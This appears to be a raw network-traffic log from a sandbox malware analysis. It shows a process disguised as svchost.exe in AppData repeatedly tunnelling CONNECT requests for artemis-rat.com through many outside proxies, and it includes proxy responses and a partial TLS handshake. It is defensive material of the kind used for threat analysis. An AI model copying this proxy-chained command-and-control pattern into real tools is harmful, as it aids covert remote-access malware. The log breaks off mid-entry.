                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2224192.168.2.55693760.12.168.114900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.281991959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.714255095 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:53:03 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2225192.168.2.555885130.255.162.1994423443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.299019098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.177000046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2226192.168.2.556434117.160.250.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.300251007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.177531958 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2227192.168.2.557101104.27.15.1618043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.302311897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.459590912 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2228192.168.2.55700365.1.244.2328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.302438974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.697105885 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:29.702832937 CET209OUTData Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ec 52 a4 f5 53 57 58 23 d2 9d b5 ea 27 8d 88 24 9c ca 2c f3 d1 07 45 c8 18 84 78 6d ea fb 64 20 13 23 14 2e be e6 8a f7 90 cb 10 59 86 ea 5b 3c 65 8e 34 56 33 4a 4b 0d 6c 62 54 54 be 97 bc 72 00 2a c0 2c c0 2b
                                                                                    Data Ascii: eRSWX#'$,Exmd #.Y[<e4V3JKlbTTr*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:30.098526001 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 58 21 79 ef b4 f8 b2 46 43 ce 97 ba ba d4 32 55 ba 3c 00 8f 65 d9 3f 23 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9X!yFC2U<e?#DOWNGRD0000*H010Uartemis-rat.com0240309113427Z260309113427Z010Uartemis-rat.com0"0*H0j/]HB
                                                                                    Mar 9, 2024 13:14:30.105036020 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 92 f5 d6 51 1c 5f 0d 8d 96 54 30 ff 0f dd a9 3a e5 f9 93 c4 46 56 08 72 bc e9 24 72 00 83 e8 22 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 af 1a bc 35 f4 e6 00 67 cd 65 37 59 49 2d 1b d3 70 28 5c 34 79
                                                                                    Data Ascii: %! Q_T0:FVr$r"(5ge7YI-p(\4y~J?qs
                                                                                    Mar 9, 2024 13:14:30.496149063 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 d4 de ec d3 e2 a4 27 06 09 8d 63 17 13 00 a4 d2 ea 66 26 97 7f 13 d0 c3 6c f7 a6 a8 21 0b 65 2a 44 c2 0a 4b a4 48 96 91
                                                                                    Data Ascii: ('cf&l!e*DKH


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2229192.168.2.556133154.12.178.1072998543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.302723885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2230192.168.2.55702243.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.329490900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2231192.168.2.55601982.113.157.1223128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.336658955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2232192.168.2.556949124.163.236.54730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.336843014 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:29.806246042 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2233192.168.2.55712964.227.106.1578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.339267969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.512599945 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2234192.168.2.557064209.97.150.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.340404987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2235192.168.2.557077162.243.102.207976443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.341787100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2236192.168.2.556791117.160.250.1638143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.343435049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.026624918 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.
                                                                                    Mar 9, 2024 13:14:32.840718985 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2237192.168.2.557018128.140.26.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.350842953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.659248114 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.25.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2238192.168.2.55652542.61.48.219800043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.352118969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.182699919 CET263INHTTP/1.1 503 Service Unavailable
                                                                                    x-envoy-overloaded: true
                                                                                    content-length: 81
                                                                                    content-type: text/plain
                                                                                    date: Sat, 09 Mar 2024 11:54:18 GMT
                                                                                    server: svcproxy
                                                                                    connection: close
                                                                                    Data Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77
                                                                                    Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2239192.168.2.55713492.204.134.381539343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.358457088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2240192.168.2.557151142.4.123.418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.359847069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2241192.168.2.55701543.131.242.1621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.365353107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2242192.168.2.55605054.36.122.162979643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.387819052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146048069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2243192.168.2.557017193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.387820005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2244192.168.2.55712598.6.197.2021609943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.393949032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.942727089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646572113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.942965031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.536746979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.385565042 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2245192.168.2.55701349.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.394650936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2246192.168.2.55614792.204.134.382582543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.394700050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646027088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645961046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2247192.168.2.55701649.228.131.169500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.399882078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2248192.168.2.55711420.210.113.32812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.422070980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.682356119 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2249192.168.2.556079120.48.62.239808043312C:\Users\user\AppData\Roaming\svchost.exe
